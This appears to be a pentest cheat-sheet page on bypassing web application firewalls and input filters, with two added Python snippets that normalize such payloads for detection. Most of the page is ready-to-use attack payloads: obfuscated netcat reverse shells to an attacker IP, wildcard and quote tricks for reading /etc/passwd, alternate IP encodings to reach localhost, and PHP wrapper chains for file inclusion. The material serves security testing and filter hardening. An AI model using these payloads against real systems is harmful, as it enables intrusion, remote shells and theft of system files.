Web Filter Bypass

Last updated 4 years ago

Payloads and Bypass Methods for Web Filtering

Use Uninitialized Shell Variables to Bypass Filters

Uninitialized shell variables can be used to bypass web application firewalls (WAFs). An unset variable expands to an empty string, so the shell runs the intended command while the request no longer contains the literal strings the filter matches on. Example: bypassing a filter to execute a reverse shell - nc$u -e /bin$u/bash$u <ip> <port>. If this doesn't work, try adding spaces before and after the variable (note the +'s; this example is also URL encoded): nc+$u++-e+/bin$u/bash$u <ip> <port> ($u in this case is a random attacker-picked variable that would hopefully be uninitialized on the target).

Use Wildcards to Bypass Filters

Bypass web filters by using bash wildcards: /???/?s

/?cmd=%2f???%2f??t%20%2f???%2fp??s?? will bypass... and execute every command that matches, such as /bin/cat /etc/apt and /bin/cat /etc/passwd.

netcat firewall bypass: /???/n? -e /???/b??h 2130706433 1337 (/???/?c.??????????? -e /???/b??h 2130706433 1337 for nc traditional)

Standard: /bin/nc 127.0.0.1 1337
Evasion: /???/n? 2130706433 1337
Used chars: / ? n [0-9]

Standard: /bin/cat /etc/passwd
Evasion: /???/??t /???/??ss??
Used chars: / ? t s

Use String Concatenation to Bypass Filters

$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
A backslash (\) can be used instead of ' as well.
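
The three shell tricks above (unset variables, wildcards, quote concatenation) all defeat literal string matching, so a detection rule has to normalize the value the way the shell would before comparing. The following is an added example, not code from the original page; `normalize`, `flagged` and the `WATCHED` list are hypothetical names with constructed contents, and the samples are the payload strings already shown on this page.

```python
import fnmatch
import re
from urllib.parse import unquote_plus

# Constructed watch list: commands and files a rule set would care about.
WATCHED = ["/bin/cat", "/bin/nc", "/bin/bash", "/etc/passwd", "nc"]

def normalize(token):
    """Undo shell-level obfuscation so the token reads as the shell sees it."""
    token = re.sub(r"\$\{?\w+\}?", "", token)  # $u / ${u}: assumed unset, expands to ""
    token = re.sub(r"['\"]", "", token)        # e'tc' is plain concatenation: etc
    return token.replace("\\", "")             # c\at is the same word as cat

def flagged(param):
    """Return the watched paths a URL-encoded parameter value can resolve to."""
    hits = []
    for token in unquote_plus(param).split():
        token = normalize(token)
        for path in WATCHED:
            # Treat the token as a glob pattern, as the shell would expand it.
            if fnmatch.fnmatchcase(path, token) and path not in hits:
                hits.append(path)
    return hits

# Samples taken from the payload strings on this page.
SAMPLES = [
    "nc+$u++-e+/bin$u/bash$u",
    "%2f???%2f??t%20%2f???%2fp??s??",
    "/b'i'n/c'a't /e't'c/p'a's's'w'd'",
    "/???/n? -e /???/b??h 2130706433 1337",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", flagged(sample))
```

A rule built this way still only covers the paths it lists; passing user input to a shell at all is the underlying defect.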

Convert IP Address to Other Formats

An IP address converted to another format, such as decimal, is still understood by most programs and languages, and avoids the . character in filtered HTTP requests: 127.0.0.1 = 2130706433

http://127.0.0.1

#0 Concatenation
http://127.0.1
http://127.1

#Decimal
http://2130706433

#Hexadecimal
http://0x7f000001

#Dotted Hexadecimal
http://0x7f.0x0.0x0.0x1
http://0x7f.0x000001
http://0x7f.0x0.00x0001

#Others (need descriptions)
http://0177.00.00.01
http://000000177.0000000.000000000.0001
http://017700000001
http://%31%32%37%2e%30%2e%30%2e%31
http://127.0x0.000000000.0x1
http://①②⑦.⓪.⓪.①
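
A filter that compares the host against a literal such as 127.0.0.1 misses every form listed above, so a server-side check has to canonicalize the host before testing it. The following is an added example, not code from the original page; `canonical_host` and `is_internal` are hypothetical names, and the component parsing follows the classic inet_aton rules (0x is hex, a leading 0 is octal, the last part fills the remaining bytes).

```python
import ipaddress
import re
import unicodedata
from urllib.parse import unquote, urlsplit

_NUM = re.compile(r"0x[0-9a-f]+|[0-9]+")

def _part(text):
    """Parse one component as inet_aton does: 0x hex, leading-0 octal, else decimal."""
    if not _NUM.fullmatch(text):
        raise ValueError(text)
    if text[:2] == "0x":
        return int(text, 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)      # raises on digits 8/9, which inet_aton also rejects
    return int(text)

def canonical_host(url):
    """Return the IPv4Address a URL's host denotes, or None if it is not numeric."""
    host = urlsplit(url).hostname or ""
    # Percent-decoding and NFKC fold %31 and circled digits to plain ASCII digits.
    host = unicodedata.normalize("NFKC", unquote(host)).lower()
    pieces = host.split(".")
    if not 1 <= len(pieces) <= 4:
        return None
    try:
        *head, last = [_part(p) for p in pieces]
    except ValueError:
        return None
    # Leading parts are one byte each; the last part fills all remaining bytes.
    if any(n > 0xFF for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last
    for i, n in enumerate(head):
        value |= n << (8 * (3 - i))
    return ipaddress.IPv4Address(value)

def is_internal(url):
    """True when the host is numerically loopback, private or link-local."""
    ip = canonical_host(url)
    return ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local)

# Forms listed on this page; every one denotes 127.0.0.1.
PAGE_FORMS = ["http://127.1", "http://2130706433", "http://0x7f.0x000001",
              "http://017700000001", "http://%31%32%37%2e%30%2e%30%2e%31",
              "http://①②⑦.⓪.⓪.①"]

if __name__ == "__main__":
    for u in PAGE_FORMS:
        print(u, "->", canonical_host(u), is_internal(u))
```

Hostnames that only resolve to an internal address through DNS are outside what this check sees; the resolved address needs the same test at connection time.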

LFI / RFI by Bypassing Filters Using Wrappers

/zlib.deflate/read=string.rot13/convert.base64-encode/convert.iconv.utf-8.utf-16/resource=<resource to get>

php://filter/ has multiple ways to bypass PHP input filters; these can be chained with | or /. Other wrappers: zip, data, expect, input, phar; many more different wrappers to try!

Injecting IPs when . is disallowed: convert dotted-decimal format to decimal value, using:

https://h.43z.one/ipconverter/
ip2dh

PayloadsAllTheThings (GitHub - swisskyrepo/PayloadsAllTheThings): A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Web Application Firewall (WAF) Evasion Techniques (Medium)
How To Exploit PHP Remotely To Bypass Filters & WAF Rules (Secjuice)
Web Application Firewall (WAF) Evasion Techniques #3 (Secjuice)